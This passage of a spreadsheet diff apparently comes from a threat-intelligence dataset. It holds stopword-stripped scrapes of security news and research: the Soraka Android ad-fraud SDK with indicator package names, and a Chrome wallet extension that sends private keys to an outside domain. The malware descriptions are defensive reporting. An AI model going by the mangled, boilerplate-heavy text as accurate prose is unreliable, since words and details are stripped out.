cominstanomoandroid comisleepcycleclockandroid comledcolorlightrolling comlitefakegpslocation comlovetestplusandroid comloveyourselfwomen comluckycharmtext comluckydestinyteller commagnifyingglasstool commathbraingamepuzzleriddle commathiqpuzzleriddlebraingame commathpuzzlesriddlebraingame commultiplescannerplusnmd commybigdayscounter commyconstellationlovework commypockermobilemirror comnannytooldata comnicemobilemirrorhd comnomophotoeditorandroid comnonstopwriting comphoneliteframe comphonemirrorpro compockerpromobilemirror comprankcallfakering comphonecallmakerandroid comprotestnoise compuzzlecutedogandroid comscancodetool comsimpledayscounter comsleepcomfortablesounds comsleepinrain comsleepassistantoolandroid comsleeptimerandroid comsmartscannermasternmd comtestfindyourlove comtestfortunetester comtestlovermatch comtinyscannertoolnmd comwmmasterandroid comwordfunlevelenglish goodluckyiscominghh mobiclockandroid myluckygoddnesstodaytest newestandroidfakelocationchanger nmdandriodbettercalculatorplus nmdandriodmobilecalculatormaster nmdandroidbestfortuneexplorer nmdandroidbetterfortunesigns nmdandroidclamwhitenoise nmdandroidfakeincomingcall nmdandroidgoodluckeveryday nmdandroidlocationfakermaster nmdandroidmultiplefortunetest nmdandroidscannermasterplus nmdandroidtestwhatsuitable photoeditorpromagic picartphotostudiopicture relaxezzzsleepcradle superluckymagicannewest testyouromanticquize wellsleepguardrelax yourbestluckymastertestnew comssdktest bedtimereminderlitesleep comfrankvideocallliteproprank compersonalfortunetext comdailybestsuityou comfalsecalltrick spread word previous post next post related posts blog post another another fraudulent fraud read article blog post greek august read article blog post satori intelligence alert proxylib lumiapps transform mobile devices proxy nodes research detection cybersecurity intelligence march read article request demo products human defender botguard growth marketing mediaguard cleanad account defender code defender credential intelligence fraud adtech marketing product solutions human defense platform account takeover account fraud transaction abuse scraping clientside data contamination programmatic fraud malvertising industries digital advertising healthcare insurance public sector streaming media travel entertainment finance marketplaces retail ecommerce technology platforms fintech company news careers leadership satori intelligence research team board directors human collective learn blog case studies webinars resource center docs tech engineering blog patents partners human collective integrations resellers technology partner portal contact request free risk assessment locations york city miami dallas washington aviv london victoria human sitemap privacy policy notice california residents cookie settings data privacy</t>
+          <t>The White Ops Threat Intelligence team recently identified 100+ malicious apps, with more than 4.6 million downloads, performing ad fraud. All of the apps use a common code package White Ops has dubbed Soraka (com.android.sorakalibrary.*). In addition to the Soraka code package, we also discovered, in some of the apps, a variant with similar functionality which we dubbed Sogo (com.android.sogolibrary.*).</t>
         </is>
       </c>
       <c r="D129" t="inlineStr">
         <is>
           <t>https://www.whiteops.com/blog/bringing-starchild-down-to-earth-soraka-sdk</t>
-        </is>
-      </c>
-      <c r="E129" t="inlineStr">
-        <is>
-          <t>['secure', 'forrester', 'wave', '™', 'showcase', 'management', 'solution', 'platform', 'human', 'defense', 'platform', 'powerful', 'platform', 'safeguard', 'entire', 'organization', 'digital', 'attack', 'takeover', 'prevent', 'account', 'compromise', 'account', 'fraud', 'fake', 'account', 'creation', 'transaction', 'abuse', 'fraudulent', 'financial', 'transaction', 'block', 'unwanted', 'data', 'exfiltration', 'clientside', 'clientside', 'attack', 'leakage', 'compliance', 'satisfy', 'data', 'contamination', 'accurate', 'data', 'analytic', 'programmatic', 'fraud', 'digital', 'advertising', 'transaction', 'malvertising', 'clean', 'digital', 'advertising', 'finance', 'healthcare', 'insurance', 'marketplace', 'public', 'sector', 'retail', 'ecommerce', 'medium', 'technology', 'platform', 'entertainment', 'fintech', 'holiday', 'readiness', 'guide', 'fraud', 'track', 'ebook', 'human', 'help', 'holiday', 'blue', 'holiday', 'report', 'report', 'grinch', 'bot', 'account', 'abuse', 'holiday', 'season', 'ciso', 'guide', 'fraud', 'prevention', 'modern', 'defense', 'online', 'fraud', 'ebook', 'modern', 'cybersecurity', 'defense', 'proactive', 'strategy', 'cisos', 'organization', 'product', 'free', 'risk', 'assessment', 'human', 'defender', 'mobile', 'application', 'apis', 'sophisticated', 'attack', 'defender', 'online', 'account', 'fraud', 'abuse', 'code', 'defender', 'website', 'clientside', 'supply', 'chain', 'credential', 'intelligence', 'realworld', 'credential', 'stuffing', 'attack', 'additional', 'layer', 'defense', 'botguard', 'growth', 'marketing', 'protection', 'marketing', 'funnel', 'sale', 'effort', 'protection', 'dsp', 'media', 'owner', 'brand', 'fraud', 'malvertising', 'vulnerability', 'organization', 'advanced', 'threat', 'fraud', 'business', 'loss', 'customer', 'experience', 'tech', 'protect', 'advertising', 'supply', 'chain', 'digital', 'channel', 'investment', 'marketing', 'performance', 'marketing', 'fraudulent', 'traffic', 'digital', 'channel', 'product', 'digital', 'experience', 'free', 'fraud', 'abuse', 'real', 'human', 'blog', 'human', 'insight', 'research', 'team', 'case', 'customer', 'human', 'video', 'human', 'expertise', 'industry', 'intelligence', 'resource', 'center', 'blog', 'whitepaper', 'research', 'video', 'article', 'place', 'documentation', 'detail', 'human', 'product', 'interface', 'team', 'intelligence', 'research', 'team', 'threat', 'insight', 'insight', 'business', 'bot', 'takeover', 'fraud', 'application', 'bot', 'bot', 'detection', 'brute', 'force', 'captcha', 'credential', 'ecommerce', 'fake', 'account', 'creation', 'compliance', 'harvesting', 'shadow', 'code', 'supply', 'chain', 'attack', 'company', 'human', 'safeguard', 'attack', 'news', 'news', 'career', 'next', 'career', 'human', 'leadership', 'elite', 'hunter', 'internet', 'safe', 'place', 'board', 'director', 'mind', 'human', 'mission', 'human', 'collective', 'collective', 'protection', 'fight', 'team', 'intelligence', 'research', 'team', 'threat', 'human', 'overview', 'human', 'protect', 'internet', 'influence', 'sophisticated', 'bot', 'overview', 'download', 'partner', 'human', 'collective', 'collective', 'protection', 'fight', 'fraud', 'partnership', 'human', 'several', 'technology', 'partner', 'mitigation', 'success', 'environment', 'reseller', 'human', 'technology', 'channel', 'partner', 'mitigation', 'solution', 'partner', 'human', 'collaborate', 'world', 'technology', 'company', 'partner', 'portal', 'human', 'partner', 'portal', 'collateral', 'documentation', 'partnership', 'free', 'risk', 'assessment', 'request', 'demo', 'platform', 'human', 'defense', 'platform', 'powerful', 'platform', 'safeguard', 'entire', 'organization', 'digital', 'attack', 'takeover', 'prevent', 'account', 'compromise', 'account', 'fraud', 'fake', 'account', 'creation', 'transaction', 'abuse', 'fraudulent', 'financial', 'transaction', 'block', 'unwanted', 'data', 'exfiltration', 'clientside', 'clientside', 'attack', 'leakage', 'compliance', 'satisfy', 'data', 'contamination', 'accurate', 'data', 'analytic', 'programmatic', 'fraud', 'digital', 'advertising', 'transaction', 'malvertising', 'clean', 'digital', 'advertising', 'finance', 'healthcare', 'insurance', 'marketplace', 'public', 'sector', 'retail', 'ecommerce', 'medium', 'technology', 'platform', 'entertainment', 'fintech', 'holiday', 'readiness', 'guide', 'fraud', 'track', 'ebook', 'human', 'help', 'holiday', 'blue', 'holiday', 'report', 'report', 'grinch', 'bot', 'account', 'abuse', 'holiday', 'season', 'ciso', 'guide', 'fraud', 'prevention', 'modern', 'defense', 'online', 'fraud', 'ebook', 'modern', 'cybersecurity', 'defense', 'proactive', 'strategy', 'cisos', 'organization', 'product', 'free', 'risk', 'assessment', 'human', 'defender', 'mobile', 'application', 'apis', 'sophisticated', 'attack', 'defender', 'online', 'account', 'fraud', 'abuse', 'code', 'defender', 'website', 'clientside', 'supply', 'chain', 'credential', 'intelligence', 'realworld', 'credential', 'stuffing', 'attack', 'additional', 'layer', 'defense', 'botguard', 'growth', 'marketing', 'protection', 'marketing', 'funnel', 'sale', 'effort', 'protection', 'dsp', 'media', 'owner', 'brand', 'fraud', 'malvertising', 'vulnerability', 'organization', 'advanced', 'threat', 'fraud', 'business', 'loss', 'customer', 'experience', 'tech', 'protect', 'advertising', 'supply', 'chain', 'digital', 'channel', 'investment', 'marketing', 'performance', 'marketing', 'fraudulent', 'traffic', 'digital', 'channel', 'product', 'digital', 'experience', 'free', 'fraud', 'abuse', 'real', 'human', 'blog', 'human', 'insight', 'research', 'team', 'case', 'customer', 'human', 'video', 'human', 'expertise', 'industry', 'intelligence', 'resource', 'center', 'blog', 'whitepaper', 'research', 'video', 'article', 'place', 'documentation', 'detail', 'human', 'product', 'interface', 'team', 'intelligence', 'research', 'team', 'threat', 'insight', 'insight', 'business', 'bot', 'takeover', 'fraud', 'application', 'bot', 'bot', 'detection', 'brute', 'force', 'captcha', 'credential', 'ecommerce', 'fake', 'account', 'creation', 'compliance', 'harvesting', 'shadow', 'code', 'supply', 'chain', 'attack', 'company', 'human', 'safeguard', 'attack', 'news', 'news', 'career', 'next', 'career', 'human', 'leadership', 'elite', 'hunter', 'internet', 'safe', 'place', 'board', 'director', 'mind', 'human', 'mission', 'human', 'collective', 'collective', 'protection', 'fight', 'team', 'intelligence', 'research', 'team', 'threat', 'human', 'overview', 'human', 'protect', 'internet', 'influence', 'sophisticated', 'bot', 'overview', 'download', 'partner', 'human', 'collective', 'collective', 'protection', 'fight', 'fraud', 'partnership', 'human', 'several', 'technology', 'partner', 'mitigation', 'success', 'environment', 'reseller', 'human', 'technology', 'channel', 'partner', 'mitigation', 'solution', 'partner', 'human', 'collaborate', 'world', 'technology', 'company', 'partner', 'portal', 'human', 'partner', 'portal', 'collateral', 'documentation', 'partnership', 'free', 'risk', 'assessment', 'request', 'demo', 'contact', 'sale', 'human', 'protection', 'expert', 'product', 'project', 'deadline', 'blog', 'human', 'insight', 'research', 'team', 'title', 'subtitle', 'content', 'title', 'subtitle', 'content', 'title', 'subtitle', 'content', 'human', 'blog', 'research', 'team', 'fraud', 'white', 'intelligence', 'team', 'malicious', 'app', 'download', 'fraud', 'app', 'common', 'code', 'package', 'soraka', 'comandroidsorakalibrary', 'addition', 'code', 'package', 'app', 'similar', 'functionality', 'comandroidsogolibrary', 'good', 'fortune', 'explorer', 'soraka', 'package', 'good', 'fortune', 'explorer', 'publisher', 'good', 'fortune', 'explorer', 'available', 'play', 'store', 'antivirus', 'detection', 'virustotal', 'download', 'fraud', 'activity', 'app', 'framework', 'marketing', 'analytic', 'fraudulent', 'appsflyer', 'installation', 'organic', 'meaning', 'install', 'promotional', 'effort', 'fraudster', 'several', 'filter', 'code', 'check', 'fraudulent', 'user', 'screen', 'topactivity', 'interval', 'installation', 'daily', 'count', 'limit', 'trigger', 'time', 'interval', 'space', 'trigger', 'likely', 'mechanism', 'detection', 'analysis', 'service', 'organic', 'appsflyer', 'mechanism', 'finegrain', 'control', 'fraud', 'control', 'platform', 'app', 'outofcontext', 'filter', 'condition', 'soraka', 'package', 'comandroidsorakalibrary', 'several', 'trigger', 'determination', 'example', 'integ', 'array', 'filter', 'home', 'button', 'running', 'method', 'public', 'string', 'hometask', 'return', 'name', 'class', 'method', 'name', 'obfuscate', 'code', 'analysis', 'difficult', 'hometask', 'class', 'cyrillic', 'udmurt', 'language', 'class', 'mopub', 'method', 'function', 'start', 'process', 'fraud', 'white', 'way', 'fraud', 'device', 'code', 'background', 'notification', 'service', 'fraud', 'activity', 'phone', 'screen', 'outofcontext', 'couple', 'second', 'device', 'second', 'clicking', 'hardware', 'home', 'button', 'action', 'code', 'fraud', 'activity', 'device', 'screen', 'host', 'broadcast', 'receiver', 'good', 'fortune', 'explorer', 'code', 'listener', 'several', 'action', 'important', 'thing', 'screen', 'state', 'user', 'presence', 'home', 'button', 'manifest', 'list', 'broadcast', 'receiver', 'function', 'figure', 'additional', 'broadcast', 'receiver', 'receiver', 'action', 'code', 'comment', 'persistence', 'main', 'java', 'persistence', 'mechanism', 'class', 'commopubcommoncacb', 'import', 'service', 'type', 'persistence', 'common', 'one', 'alarm', 'operating', 'system', 'syncable', 'account', 'service', 'possible', 'service', 'available', 'method', 'alarm', 'mechanism', 'intent', 'service', 'version', 'great', 'even', 'device', 'method', 'ability', 'account', 'syncable', 'synced', 'method', 'period', 'second', 'account', 'device', 'persistence', 'native', 'library', 'native', 'function', 'infinite', 'loop', 'second', 'file', 'file', 'force', 'library', 'javacallback', 'function', 'intelligence', 'team', 'monitor', 'package', 'package', 'removal', 'app', 'indicator', 'section', 'indicator', 'compromise', 'package', 'andor', 'package', 'name', 'combeautymirrorlite', 'combkkmasterandroid', 'comcalculatorgame', 'comcardlife', 'comcartooncameraproandroid', 'comdogbarkpicturepuzzle', 'commathbraingamepuzzleriddle', 'commyconstellationlovework', 'commypockermobilemirror', 'comphoneliteframe', 'comphonemirrorpro', 'compockerpromobilemirror', 'comphonecallmakerandroid', 'comprotestnoise', 'comscancodetool', 'comsimpledayscounter', 'comsleepinrain', 'mobiclockandroid', 'myluckygoddnesstodaytest', 'nmdandroidclamwhitenoise', 'nmdandroidmultiplefortunet', 'nmdandroidscannermasterplus', 'nmdandroidtestwhatsuitable', 'photoeditorpromagic', 'picartphotostudiopicture', 'relaxezzzsleepcradle', 'word', 'previous', 'post', 'next', 'post', 'post', 'post', 'fraudulent', 'fraud', 'read', 'blog', 'post', 'greek', 'blog', 'mobile', 'device', 'proxy', 'research', 'detection', 'cybersecurity', 'read', 'article', 'demo', 'product', 'human', 'defender', 'botguard', 'growth', 'marketing', 'defender', 'intelligence', 'fraud', 'adtech', 'marketing', 'product', 'solution', 'human', 'defense', 'platform', 'account', 'takeover', 'account', 'fraud', 'transaction', 'abuse', 'clientside', 'datum', 'contamination', 'programmatic', 'fraud', 'malvertising', 'industry', 'digital', 'advertising', 'healthcare', 'insurance', 'public', 'sector', 'streaming', 'medium', 'travel', 'entertainment', 'finance', 'marketplace', 'retail', 'ecommerce', 'technology', 'platform', 'company', 'news', 'career', 'research', 'team', 'board', 'director', 'human', 'collective', 'blog', 'case', 'study', 'resource', 'center', 'tech', 'blog', 'patent', 'partner', 'human', 'collective', 'integration', 'reseller', 'technology', 'partner', 'portal', 'contact', 'free', 'risk', 'assessment', 'location', 'privacy', 'policy', 'notice', 'cookie', 'setting', 'datum', 'privacy']</t>
         </is>
       </c>
     </row>
@@ -3802,17 +3302,12 @@
       </c>
       <c r="C130" t="inlineStr">
         <is>
-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines tech home tech chrome extension caught stealing cryptowallet private keys google chrome extension named shitcoin wallet stealing passwords wallet private keys researcher says written catalin cimpanu contributor google chrome extension caught injecting javascript code pages steal passwords private keys cryptocurrency wallets cryptocurrency portals extension named shitcoin wallet chrome extension ckkgmccefffnbbalkmbbgebbojjogffn launched last month december according introductory blog post shitcoin wallet lets users manage ether coins also ethereum erc20based tokens tokens usually issued icos initial coin offerings users install chrome extension manage coins erc20 tokens within browser install windows desktop want manage funds outside browsers riskier environment malicious behavior breakdown however wallet wasnt promised yesterday harry denley director mycrypto platform discovered extension contained malicious code according denley extension dangerous users ways first funds coins erc0based tokens managed directly inside extension risk denley says extension sends private keys wallets created managed interface thirdparty website located erc20wallettk second extension also actively injects malicious javascript code users navigate five wellknown popular cryptocurrency management platforms code steals login credentials private keys data sent erc20wallettk thirdparty website according analysis malicious code process goes follows users install chrome extension chrome extension requests permission inject javascript code websites listed users navigate sites extension loads injects additional file httpserc20wallettkjscontentjs file contains obfuscated code deobfuscated code activates five websites myetherwalletcom idexmarket binanceorg neotrackerio switcheoexchange activated malicious code records users login credentials searches private keys stored inside dashboards five services finally sends data erc20wallettk time writing extension still available download official google chrome store listed installs unclear shitcoin wallet team responsible malicious code chrome extension compromised thirdparty spokesperson shitcoin wallet team reply request comment articles publication desktop extensions official website 32bit 64bit installers also made available users scans virustotal website aggregates virus scanning engines several antivirus software makers show files clean however numerous comments posted wallets telegram channel suggest desktop apps might contain similarly malicious code worse image zdnet cryptocurrency cyberattacks breaches pictures need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone editorial standards show comments comment community guidelines related google chrome better protects risky websites weak passwords best airtag wallet flat rechargeable isnt made apple best magsafe wallets expert tested zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>Chrome extension stealing crypto-wallet private keys: Shitcoin Wallet</t>
         </is>
       </c>
       <c r="D130" t="inlineStr">
         <is>
           <t>https://www.zdnet.com/article/chrome-extension-caught-stealing-crypto-wallet-private-keys</t>
-        </is>
-      </c>
-      <c r="E130" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'home', 'tech', 'chrome', 'extension', 'cryptowallet', 'private', 'key', 'chrome', 'extension', 'shitcoin', 'wallet', 'password', 'wallet', 'private', 'key', 'researcher', 'extension', 'javascript', 'code', 'page', 'password', 'private', 'key', 'wallet', 'cryptocurrency', 'portal', 'extension', 'shitcoin', 'wallet', 'chrome', 'extension', 'ckkgmccefffnbbalkmbbgebbojjogffn', 'last', 'month', 'introductory', 'blog', 'shitcoin', 'wallet', 'user', 'ether', 'coin', 'token', 'token', 'initial', 'coin', 'offering', 'user', 'chrome', 'extension', 'manage', 'coin', 'token', 'desktop', 'fund', 'browser', 'risky', 'environment', 'malicious', 'behavior', 'breakdown', 'wallet', 'yesterday', 'platform', 'extension', 'malicious', 'code', 'denley', 'extension', 'dangerous', 'user', 'way', 'first', 'fund', 'coin', 'token', 'extension', 'risk', 'extension', 'private', 'key', 'wallet', 'interface', 'thirdparty', 'website', 'second', 'extension', 'malicious', 'javascript', 'code', 'user', 'wellknown', 'popular', 'cryptocurrency', 'management', 'platform', 'login', 'credential', 'private', 'key', 'datum', 'thirdparty', 'website', 'analysis', 'malicious', 'code', 'process', 'user', 'chrome', 'extension', 'chrome', 'extension', 'request', 'permission', 'javascript', 'code', 'website', 'user', 'site', 'extension', 'load', 'additional', 'file', 'file', 'code', 'code', 'website', 'malicious', 'code', 'record', 'user', 'login', 'credential', 'private', 'key', 'dashboard', 'service', 'datum', 'time', 'writing', 'extension', 'available', 'download', 'official', 'store', 'unclear', 'shitcoin', 'wallet', 'team', 'responsible', 'malicious', 'code', 'chrome', 'extension', 'thirdparty', 'spokesperson', 'shitcoin', 'wallet', 'team', 'comment', 'article', 'publication', 'desktop', 'extension', 'official', 'website', '32bit', '64bit', 'installer', 'available', 'user', 'virustotal', 'website', 'virus', 'engine', 'several', 'software', 'maker', 'file', 'clean', 'numerous', 'comment', 'wallet', 'telegram', 'channel', 'desktop', 'app', 'malicious', 'code', 'bad', 'image', 'zdnet', 'cryptocurrency', 'cyberattack', 'breach', 'picture', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'editorial', 'standard', 'comment', 'comment', 'community', 'guideline', 'risky', 'website', 'weak', 'password', 'wallet', 'flat', 'rechargeable', 'apple', 'good', 'magsafe', 'wallet', 'expert', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
         </is>
       </c>
     </row>
@@ -3829,17 +3324,12 @@
       </c>
       <c r="C131" t="inlineStr">
         <is>
-          <t>business search close solutions challenge challenge challenge learn understand prioritize mitigate risks understand prioritize mitigate risks improve risk posture attack surface management learn protect cloudnative apps protect cloudnative apps enables business outcomes learn protect hybrid world protect hybrid multicloud world gain visibility meet business needs learn securing borderless workforce securing borderless workforce connect confidence anywhere device learn eliminate network blind spots eliminate network blind spots secure users operations throughout environment learn respond faster respond faster move faster adversaries powerful purposebuilt attack surface risk management zero trust capabilities learn extend team extend team respond threats agilely maximize effectiveness proactive risk reduction managed services learn operationalizing zero trust operationalizing zero trust understand attack surface assess risk real time adjust policies across network workloads devices single console learn role role role learn ciso ciso drive business value measurable cybersecurity outcomes learn manager manager faster learn infrastructure manager infrastructure manager evolve mitigate threats quickly effectively learn cloud builder developer cloud builder developer ensure code runs intended learn cloud cloud gain visibility control designed cloud environments learn industry industry industry learn healthcare healthcare protect patient data devices networks meeting regulations learn manufacturing manufacturing protecting factory environments traditional devices stateoftheart infrastructures learn icsot utility industry learn electric utility electric utility icsot electric utility learn federal federal learn automotive automotive learn networks networks learn small midsized business small midsized business stop threats comprehensive setitandforgetit protection learn platform vision platform vision platform trend vision unified platform bridge protection cyber risk management learn companion trend vision companion generative cybersecurity assistant learn attack surface management attack surface management stop breaches happen learn extended detection response extended detection response stop adversaries faster broader perspective better context hunt detect investigate respond threats single platform learn cloud cloud trend vision one™ cloud overview trusted cloud platform developers teams businesses learn attack surface risk management cloud attack surface risk management cloud cloud asset discovery vulnerability prioritization cloud posture management attack surface management learn cloud cloud extend visibility cloud streamline investigations learn workload workload secure data center cloud containers without compromising performance leveraging cloud platform cnapp capabilities learn container container simplify cloudnative applications advanced container image scanning policybased admission control container runtime protection learn file storage file storage cloud fileobject storage services leveraging cloudnative application architectures learn endpoint endpoint endpoint overview defend endpoint every stage attack learn endpoint endpoint stop adversaries faster broader perspective better context hunt detect investigate respond threats single platform learn workload workload optimized prevention detection response endpoints servers cloud workloads learn industrial endpoint industrial endpoint learn mobile mobile onpremises cloud protection malware malicious applications mobile threats learn network network network overview expand power network detection response learn network network stop adversaries faster broader perspective better context hunt detect investigate respond threats single platform learn network intrusion prevention network intrusion prevention protect known unknown undisclosed vulnerabilities network learn breach detection system breach detection system detect respond targeted attacks moving inbound outbound laterally learn secure service edge secure service edge redefine trust secure digital transformation continuous risk assessments learn industrial network industrial network learn network network learn email email email stop phishing malware ransomware fraud targeted attacks infiltrating enterprise learn email collaboration trend vision one™ email collaboration stop phishing ransomware targeted attacks email service including microsoft google workspace learn learn solutions learn stop adversaries faster broader perspective better context hunt detect investigate respond threats single platform learn industrial network industrial network industrial network industrial endpoint industrial endpoint learn intelligence intelligence keep ahead latest threats protect critical data ongoing prevention analysis learn products services trials products services trials learn research research research research learn research news perspectives research news perspectives learn research analysis research analysis learn news news learn zero initiatives zero initiatives learn services services services services learn service packages service packages augment teams managed detection response support learn managed managed augment detection expertly managed detection response email endpoints servers cloud workloads networks learn incident response incident response incident response trusted experts call whether youre experiencing breach looking proactively improve plans learn insurance carriers firms insurance carriers firms stop breaches best response detection technology market reduce clients’ downtime claim costs learn support services support services learn partners partner program partner program partner program overview grow business protect customers bestinclass complete multilayered learn managed service provider managed service provider deliver modern operations services industryleading learn managed service provider managed service provider partner leading expert cybersecurity leverage proven solutions designed msps learn cloud service provider cloud service provider marketleading cloud service offerings matter platform learn professional services professional services increase revenue industryleading learn resellers resellers discover possibilities learn marketplace marketplace learn system integrators system integrators learn alliance partners alliance partners alliance overview work best help optimize performance value learn technology alliance partners technology alliance partners learn alliance partners alliance partners learn partner tools partner tools partner tools learn partner login partner login login education certification education certification learn partner successes partner successes learn distributors distributors learn find partner find partner learn company trend micro trend micro trend micro learn customer success stories customer success stories learn human connection human connection learn industry accolades industry accolades learn strategic alliances strategic alliances learn compare trend micro compare trend micro compare trend micro trend outperforms competition lets crowdstrike trend micro crowdstrike crowdstrike provides effective cybersecurity cloudnative platform pricing stretch budgets especially organizations seeking costeffective scalability true single platform lets microsoft trend micro microsoft microsoft offers foundational layer protection often requires supplemental solutions fully address customers problems lets palo alto networks trend micro palo alto networks palo alto networks delivers advanced cybersecurity solutions navigating comprehensive suite complex unlocking capabilities requires significant investment lets learn trust center trust center learn history history learn diversity equity inclusion diversity equity inclusion learn corporate social responsibility 